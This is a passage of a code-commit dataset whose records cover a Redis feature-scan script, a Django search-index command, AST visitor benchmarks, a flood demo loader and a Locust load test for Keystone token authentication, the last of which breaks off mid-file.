print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
<commit_before><commit_msg>Change Rules no,no,no to no,, & update some libs<commit_after># -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
|
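The HSCAN loop in the record above hard-codes 11123 rounds; a sketch of the usual cursor-terminated form with the same redis-py call (client setup assumed as above; handle() is a hypothetical per-entry callback standing in for the record's filtering and CSV write):

# Sketch: iterate the Redis hash until HSCAN's cursor wraps back to 0,
# instead of guessing the number of rounds up front.
cursor = 0
while True:
    cursor, chunk = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
    for key, cnt in chunk.items():
        handle(key, cnt)  # hypothetical: apply the threshold/ratio checks here
    if cursor == 0:
        break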
b132993ed859b2c727edd2a6db08b08c011a8b29
|
ooni/lib/__init__.py
|
ooni/lib/__init__.py
|
import sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
Add hack to make import of txtorcon work
|
Add hack to make import of txtorcon work
|
Python
|
bsd-2-clause
|
kdmurray91/ooni-probe,Karthikeyan-kkk/ooni-probe,lordappsec/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,Karthikeyan-kkk/ooni-probe,lordappsec/ooni-probe,juga0/ooni-probe,juga0/ooni-probe,0xPoly/ooni-probe,kdmurray91/ooni-probe,kdmurray91/ooni-probe,hackerberry/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,0xPoly/ooni-probe,juga0/ooni-probe,0xPoly/ooni-probe,juga0/ooni-probe,Karthikeyan-kkk/ooni-probe,hackerberry/ooni-probe,lordappsec/ooni-probe
|
Add hack to make import of txtorcon work
|
import sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
<commit_before><commit_msg>Add hack to make import of txtorcon work<commit_after>
|
import sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
Add hack to make import of txtorcon workimport sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
<commit_before><commit_msg>Add hack to make import of txtorcon work<commit_after>import sys
import os
pwd = os.path.dirname(__file__)
#child_path = os.path.normpath(os.path.join(pwd, '..'))
#sys.path.append(child_path)
sys.path.append(pwd)
|
|
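The sys.path hack above re-appends the directory on every import of the package; a slightly safer variant of the same trick guards against duplicate entries:

import os
import sys

# Same hack as the commit, but only extend sys.path once per process.
pwd = os.path.dirname(__file__)
if pwd not in sys.path:
    sys.path.append(pwd)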
e231c8997d3fedc22dfd356227c080b1d5a9ac94
|
localtv/management/commands/update_index_in_tmpdir.py
|
localtv/management/commands/update_index_in_tmpdir.py
|
# This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
Add new management command for updating the search index
|
Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.
|
Python
|
agpl-3.0
|
pculture/mirocommunity,pculture/mirocommunity,pculture/mirocommunity,pculture/mirocommunity
|
Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.
|
# This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
<commit_before><commit_msg>Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.<commit_after>
|
# This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.# This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
<commit_before><commit_msg>Add new management command for updating the search index
This management command does the work in /tmp rather than in the real XAPIAN_INDEX.<commit_after># This file is part of Miro Community.
# Copyright (C) 2011 Participatory Culture Foundation
#
# Miro Community is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# Miro Community is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Miro Community. If not, see <http://www.gnu.org/licenses/>.
import tempfile
import os
import shutil
import django.conf
from django.core.management.base import NoArgsCommand
import haystack.management.commands.update_index
class Command(NoArgsCommand):
args = ''
def handle_noargs(self, **options):
# This just calls update_index(), but it temporarily
# overrides the XAPIAN_INDEX path to a path in /tmp.
#
# This avoids NFS locking during the Xapian index process.
old_xapian_path = django.conf.settings.HAYSTACK_XAPIAN_PATH
if old_xapian_path.endswith('/'):
old_xapian_path = old_xapian_path[:-1]
tmpdir = tempfile.mkdtemp(dir='/tmp/')
django.conf.settings.HAYSTACK_XAPIAN_PATH = tmpdir
cmd = haystack.management.commands.update_index.Command()
cmd.handle()
# If we get this far, move the tmpdir to the real path
new_path = old_xapian_path + ('.tmp.%d' % os.getpid())
assert not os.path.exists(new_path)
shutil.move(tmpdir, new_path)
os.rename(old_xapian_path, old_xapian_path + '.old')
os.rename(new_path, old_xapian_path)
shutil.rmtree(old_xapian_path + '.old')
|
|
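The final swap in the command above is three separate filesystem steps, so a crash between the two os.rename calls briefly leaves no live index. A sketch of the same sequence factored into a helper, assuming the staging path and the live index sit on one filesystem (where os.rename is atomic):

import os
import shutil

def swap_index_dirs(built_tmpdir, live_path):
    """Move a freshly built index into place; the window with no live
    index is limited to the gap between the two renames."""
    staging = '%s.tmp.%d' % (live_path, os.getpid())
    assert not os.path.exists(staging)
    shutil.move(built_tmpdir, staging)  # may copy if filesystems differ
    old = live_path + '.old'
    os.rename(live_path, old)           # atomic on the same filesystem
    os.rename(staging, live_path)       # atomic on the same filesystem
    shutil.rmtree(old)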
6b7497f2c2c11d3a805cc6d2a26eedcc47f68e6c
|
tests/asttools/test_visitor.py
|
tests/asttools/test_visitor.py
|
"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
    # Trickery to get the path of a nearby file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
Add small test/benchmark for asttools.visitor
|
Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com>
|
Python
|
apache-2.0
|
kevinconway/pycc,kevinconway/pycc
|
Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com>
|
"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
    # Trickery to get the path of a nearby file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
<commit_before><commit_msg>Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com><commit_after>
|
"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
    # Trickery to get the path of a nearby file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com>"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
    # Trickery to get the path of a nearby file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
<commit_before><commit_msg>Add small test/benchmark for asttools.visitor
This test ensures that the non-recursive implementation of the
NodeVisitor is faster at processing large AST's than the standard
implementation.
Signed-off-by: Kevin Conway <3473c1f185ca03eadc40ad288d84425b54fd7d57@gmail.com><commit_after>"""Test suite for asttools.visitor."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import ast
import functools
import timeit
import os
import pytest
from pycc.asttools import parse
from pycc.asttools import visitor
@pytest.fixture
def big_ast():
"""Generate a large AST."""
    # Trickery to get the path of a nearby file.
file_path = os.path.join(
os.path.dirname(
os.path.realpath(__file__)
),
'test_name.py',
)
with open(file_path, 'r') as source_file:
node = parse.parse(source_file.read())
# Duplicate the body several times.
for x in range(5):
node.body.extend(node.body)
return node
def test_visitor_out_performs_original(big_ast):
"""Ensure the non-recursive implementation is at least 2x faster."""
samples = 100
original_visitor = ast.NodeVisitor()
original_time = timeit.timeit(
functools.partial(
original_visitor.visit,
big_ast,
),
number=samples,
)
custom_visitor = visitor.NodeVisitor(big_ast)
custom_time = timeit.timeit(
custom_visitor.visit,
number=samples,
)
avg_time = (original_time + custom_time) / 2
diff_time = original_time - custom_time
pct_diff = (diff_time / avg_time) * 100
assert pct_diff > 100
|
|
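The benchmark above compares ast.NodeVisitor against pycc's non-recursive visitor without showing the latter; a minimal sketch of the stack-based traversal such a visitor typically uses (an illustration of the technique, not pycc's actual implementation):

import ast

def visit_iteratively(root, callback):
    """Walk an AST without recursion, calling callback on every node."""
    stack = [root]
    while stack:
        node = stack.pop()
        callback(node)
        # Depth-first; children come off the stack right-to-left.
        stack.extend(ast.iter_child_nodes(node))

# Usage: count the nodes of a small module.
tree = ast.parse("x = 1")
seen = []
visit_iteratively(tree, seen.append)
print(len(seen))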
ada67d87d6afca677bbc3daae3329c83754d6e55
|
django_project/realtime/management/commands/loadfloodtestdata.py
|
django_project/realtime/management/commands/loadfloodtestdata.py
|
# coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
Add command to load flood test data for demo purpose.
|
Add command to load flood test data for demo purpose.
|
Python
|
bsd-2-clause
|
AIFDR/inasafe-django,AIFDR/inasafe-django,AIFDR/inasafe-django,AIFDR/inasafe-django
|
Add command to load flood test data for demo purpose.
|
# coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
<commit_before><commit_msg>Add command to load flood test data for demo purpose.<commit_after>
|
# coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
Add command to load flood test data for demo purpose.# coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
<commit_before><commit_msg>Add command to load flood test data for demo purpose.<commit_after># coding=utf-8
from django.core.management.base import BaseCommand
from realtime.tasks.test.test_realtime_tasks import flood_layer_uri
from realtime.tasks.realtime.flood import process_flood
class Command(BaseCommand):
"""Script to load flood test data for demo purpose only.
"""
help = 'Script to load flood test data for demo purpose only.'
def handle(self, *args, **options):
flood_id = '2018022511-6-rw'
print 'Send flood data to InaSAFE Django with flood id = %s' % flood_id
process_flood.delay(
flood_id=flood_id,
data_source='hazard_file',
data_source_args={
'filename': flood_layer_uri
}
)
|
|
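The handler above uses a Python 2 print statement, which matches the repository at the time; for reference, a sketch of the same handler under Python 3 conventions, where BaseCommand output usually goes through self.stdout.write (the task import and flood_layer_uri are assumed as in the record):

# Hypothetical Python 3 port of Command.handle(); drop-in for the class above.
def handle(self, *args, **options):
    flood_id = '2018022511-6-rw'
    self.stdout.write(
        'Send flood data to InaSAFE Django with flood id = %s' % flood_id)
    process_flood.delay(
        flood_id=flood_id,
        data_source='hazard_file',
        data_source_args={'filename': flood_layer_uri},
    )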
6b7a8b4cc6552a9558e1c0cc0686aa1a347555e3
|
thinc/tests/unit/test_about.py
|
thinc/tests/unit/test_about.py
|
'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
Add tests for about module
|
Add tests for about module
|
Python
|
mit
|
spacy-io/thinc,explosion/thinc,explosion/thinc,spacy-io/thinc,spacy-io/thinc,explosion/thinc,explosion/thinc
|
Add tests for about module
|
'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
<commit_before><commit_msg>Add tests for about module<commit_after>
|
'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
Add tests for about module'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
<commit_before><commit_msg>Add tests for about module<commit_after>'''Test that about.py imports correctly and has expected attributes.'''
from ... import about
def test_about_attrs():
about.__name__
about.__version__
about.__summary__
about.__uri__
about.__author__
about.__email__
about.__license__
about.__title__
about.__release__
|
|
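The test above passes as long as bare attribute access does not raise; an equivalent, slightly more explicit sketch that loops over the expected names (assumes the same relative import of about):

# Sketch: data-driven version of test_about_attrs.
EXPECTED_ATTRS = ('__name__', '__version__', '__summary__', '__uri__',
                  '__author__', '__email__', '__license__', '__title__',
                  '__release__')

def test_about_attrs_explicit():
    for name in EXPECTED_ATTRS:
        assert hasattr(about, name), 'about.%s is missing' % name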
67097201c27f0951c44be9a6b6956a5b7ac4aa5c
|
keystone_performance/auth_validate_multiple_endpoints/locustfile.py
|
keystone_performance/auth_validate_multiple_endpoints/locustfile.py
|
from time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
    # every time the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
Add multiple endpoint auth and validate test plan
|
Add multiple endpoint auth and validate test plan
|
Python
|
apache-2.0
|
lbragstad/locust-scripts
|
Add multiple endpoint auth and validate test plan
|
from time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
# TODO(lbragstad): Turn this test case into one that supports
# generating an admin token with an admin user, instead of using
# auth_token.
admin_token = 'ADMIN'
headers = {'X-Subject-Token': token,
'X-Auth-Token': admin_token}
for i in range(5):
response = self.client.get(path, headers=headers)
class KeystoneUser(locust.HttpLocust):
task_set = Authenticate
# NOTE(lbragstad): Make this a list of endpoints. Also find a way to pass
# in these endpoints to the scripts instead of having to modify the test
    # every time the endpoint changes.
host = ['http://<api_haproxy_ip>:<port>']
min_wait=1000
max_wait=1000
|
<commit_before><commit_msg>Add multiple endpoint auth and validate test plan<commit_after>
|
from time import sleep
import locust
import json
class Authenticate(locust.TaskSet):
@locust.task
def authenticate(self):
# Set header information and path
headers = {'content-type': 'application/json'}
path = '/v3/auth/tokens'
# Build authentication request with an existing user. This will be
# an unscoped token request.
request = {
'auth': {
'identity': {
'methods': [
'password'
],
'password': {
'user': {
'id': '9fff846eb28442418612b94fccda9264',
'password': 'sup3rs3cr3t'
}
}
}
}
}
# Since this is a python-request object handed to us on HttpLocust()
# object initialization, we can pass extra stuff if necessary using
# kwargs. Call to POST `/v3/auth/tokens` and capture the response
# object.
response = self.client.post(path, data=json.dumps(request),
headers=headers)
# If we know we can pull a token out of the `X-Subject-Token` header,
# then proceed with the test plan and immediately attempt to validate
# the token several times. Here we are trying to see if we can get
# Keystone to throw a 404.
if response.status_code == 201:
token = response.headers['X-Subject-Token']
